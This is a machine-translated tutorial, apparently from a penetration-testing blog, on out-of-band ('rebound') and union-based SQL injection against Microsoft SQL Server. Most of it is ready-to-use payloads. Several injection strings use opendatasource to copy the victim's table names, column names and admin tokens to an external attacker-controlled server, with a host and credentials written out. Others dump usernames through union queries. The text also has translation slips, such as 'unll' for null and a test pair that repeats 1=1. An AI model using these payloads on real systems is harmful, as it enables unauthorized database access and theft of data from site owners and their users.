In this article:
- MSSQL rebound injection usage scenarios
- MSSQL rebound injection statement parsing
- MSSQL rebound injection specific process
- MSSQL error injection specific process
1. MSSQL rebound injection usage scenario:
1 Introduction:
MSSQL injection attacks are the most complex database technology. Because the database is very powerful, the stored procedures and function statements are very rich. These flexible statements have long been novel and unique attack ideas.
2. MSSQL rebound injection:
It is obviously the point of SQL injection, but it cannot be injected. The speed of guessing by the injection tool is extremely slow, the error message is closed, and the injection result cannot be returned. These are problems often encountered in injection attacks.
In order to understand these intractable diseases, a better solution is to use rebound injection technology, and rebound injection technology needs to rely on the support of opendatasource function.
3. Rebound injection is limited to MSSQL database.
4. MSSQL injection-bounce injection is actually sending the queried data to our MSSQL server, then we need our own MSSQL database and a public IP.
2. Analysis of MSSQL rebound injection statement:
1. Joint query as an example:
First guess the field
Union query, to write union all
Judging the output point needs to use null to fill
The comment is only-+ (don't think about #)
2. MSSQL statement:
dbo.sysdatabases query system library
sysobjects where xtype = 'u' query system table
syscolumns where id = 'Specify the corresponding id value in the sysobjects table'
3. Function
opendatasource can be understood as using this function to send the results of the current database query to another database server.
Syntax: opendatasource (provider_name, init_string).
provider_name: Register the UPROGID name of the OLEDB provider used to access the data source, and the MSSQL name is SQLOLEDB.
init_string:
Link string
Link address, port library, user name, password, database name.
server = link address, port; uid = user name; pwd = password; database = database name
Examples:
insert into opendatasource('sqloledb','server=; uid=; pwd=; database=').库名.dbo.表名 select * from admin --
3. MSSQL rebound injection specific process:
例题:SELECT* FROM NEWS WHERE id='1'
1. Determine whether there is SQL injection:
' and 1=1 -- qwe 和 ' and 1=2 -- qwe
2. Query table name:
'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D6922_aa_admin;pwd=12345678;database=DB_14D6922_aa').DB_14D6922_aa.dbo.t select id,name from sysobjects where xtype='u' --
3. Query field name:
'; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D6922_aa_admin;pwd=12345678;database=DB_14D6922_aa').DB_14D6922_aa.dbo.t select id,name from syscolumns where id=1977058079 --
4. Query data:
';insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D6922_aa_admin;pwd=12345678;database=DB_14D6922_aa').DB_14D6922_aa.dbo.t select null,token from admin --
4. The specific process of MSSQL error injection:
例题:SELECT* FROM NEWS WHERE id='1'
1. Determine whether there is SQL injection:
' and 1=1 -- qwe 和 ' and 1=1 -- qwe
2. Determine the number of page fields:
' order by 1…… -- qwe
3. View the output point:
' union all select null,null,null from admin -- qwe
4. Query table name:
' union all select id,name,null from sysobjects where xtype='u' --qwe
5. Query field name:
' union all select null,name,null from syscolumns where id=1977058079 -- qwe
6. Query data:
' union all select unll,username,null from admin -- qwe